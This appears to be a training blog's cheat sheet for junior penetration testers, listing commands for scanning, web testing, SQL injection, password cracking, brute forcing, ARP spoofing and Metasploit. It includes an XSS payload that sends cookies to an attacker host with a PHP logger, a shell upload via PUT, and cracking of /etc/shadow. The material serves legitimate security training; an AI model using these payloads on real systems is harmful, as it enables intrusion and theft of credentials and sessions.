Home

Junior Penetration Tester cheat sheet

Oleg Mitrakhovich - July 8, 2021

Introduction

There are lots of resources out there that can help you start in penetration testing. One of those resources is the WYWM potential platform among other junior penetration certifications. Recently I was able to certify as a junior penetration tester. I realized that at a junior level, there are not that many commands and tools that a junior penetration tester needs to know. In fact, I was able to summarize all the commands and tools in a form of a cheat sheet. These are the commands I use everyday and having this cheat sheet saves a lot of time. If you know all the commands/tools below, this cheat sheet will prepare you for your first junior penetration certification.

*Disclaimer

Penetration testing is a lot more than just throwing commands against a machine. 

I would highly suggest before attempting to use these commands/tools for real-life engagements to have taken an ethical hacking course prior. Myself nor the company is responsible for the ill usage of these commands/tools, these are presented solely for educational purposes.

Also, before attempting any certification, you should practise all of these commands in some sort of a lab environment and understand how these tools/commands work together.

Let's begin!

Enumeration 

Anyone who has done any type of penetration testing knows that enumeration is half the battle. Here are some of the techniques you should know.

Nmap Scans

nmap Scan (Full)

               nmap -sC -sV -p- 10.10.10.10

nmap Scan (UDP Partial)

                nmap -sU -sV 10.10.10.10

nmap Scan (Partial)

                nmap -sC -sV 10.10.10.10

OS Detection

                nmap -O 10.10.10.10

whois

                whois site.com

Host Discovery

                fping -a -g 10.10.10.0/24 2>/dev/null
		nmap -sn 10.10.10.0/24 (to skip port scan phase)
		netdiscover -r 10.10.10.0/24

Web Applications 

The next set of commands should be used when attacking a web application. Actually understanding what these do and not just throwing them against your target, is really important.

Banner Grabbing

                nc -v 10.10.10.10 <port#>
		HEAD / HTTP/1.0
		
		(press the enter key twice)

OpenSSL for HTTPS services

                openssl s_client -connect 10.10.10.10:443
		HEAD / HTTP/1.0

Cross Site Scripting (XSS)

                <script>alert(‘xss’);</script>
		<script>alert (document.cookie)</script>
		<img src=”javascript:alert(1)”>
		http://victim.site/search.php?find=<payload>

To send cookie to attacker-controlled site:

                <script>
		var i = new Image();
		i.src=”http://attacker.site/log.php?q=”+document.cookie;
		</script>

Log.php page on attacker’s site:

                <?php
		$filename=”/tmp/log.txt”;
		$fp=fopen($filename, ‘a’);
		$cookie=$_GET[‘q’];
		$fwrite($fp, $cookie);
		fclose($fp);
		?>

HTTPRINT

                Httprint -P0 -h 10.10.10.10 -s /path/to/signatirefile.txt

HTTP Verbs

                GET, POST, HEAD, PUT, DELETE, OPTIONS

Using verb OPTIONS will show you what other verbs available

                nc 10.10.10.10 80
		OPTIONS / HTTP/1.0

To upload files using HTTP use the PUT verb as follows:

                 wc -m shell.php

The command above will give the size of the payload, then use the following:

                 PUT /shell.php
                 Content-type: text/html
                 Content-length: <payload size>

Directory and File Scanning

                dirb http://10.10.10.10 
		dirsearch.py -u http://10.10.10.10 -e *
		gobuster -u 10.10.10.10 -w /path/to/wordlist.txt 

		dirbuster 
		nikto -h 10.10.10.10

SQLMAP

                sqlmap -u http://10.10.10.10 -p <parameter>
		sqlmap -u http://10.10.10.10 --data POSTstring -p <parameter>
		sqlmap -u http://10.10.10.10 --os-shell
		sqlmap -u http://10.10.10.10 --dump

		Order to use in:

                #to identify database
                sqlmap -u http://10.10.10.10 -dbs 
                
		#to identify tables
                sqlmap -u http://10.10.10.10 -D <name of db> --tables 
                
          #to dump database 
          sqlmap -u http://10.10.10.10 -D <name of db> -T <name of table> --dump
                

System Attacks 

This portion will cover system attacks, it is very important to understand how to execute brute force attacks and how to run exploits.

Password Attacks

                unshadow /etc/passwd /etc/shadow > password.txt
		john password.txt
		john -show password.txt

Hash Cracking

                john -wordlist /path/to/wordlist -users=users.txt hashfile

Brute Forcing with Hydra

                hydra -L users.txt -P pass.txt -t 10 10.10.10.10 ssh -s 22
		hydra -L users.txt -P pass.txt telnet://10.10.10.10

ARP spoofing

                echo 1 > /proc/sys/net/ipv4/ip_forward
		arpspoof -i tap0 -t 10.10.10.10 -r 10.10.10.11

Metasploit

                search <name of exploit>
		use <name of exploit>
		info 
		show options, show advanced options
                SET RHOST 10.10.10.10
                SET payload <name of payload>
                Exploit

                background
                sessions -l
                sessions -i 1

ROUTING

I would practise your routing if you are planning to take any junior penetration tester certification. Here is a command to remember:

                ip route add ROUTETO via ROUTEFROM

Example:

                ip route add 10.10.10.10 via 192.168.0.1
If you want to break into the tech industry then sign up to our platform and begin your training today.

Leave a Reply

Your email address will not be published. Required fields are marked *

Join our community

We have a Discord server where you’ll be able to chat with your instructors and cohort. Stay active in your learning!
Join discord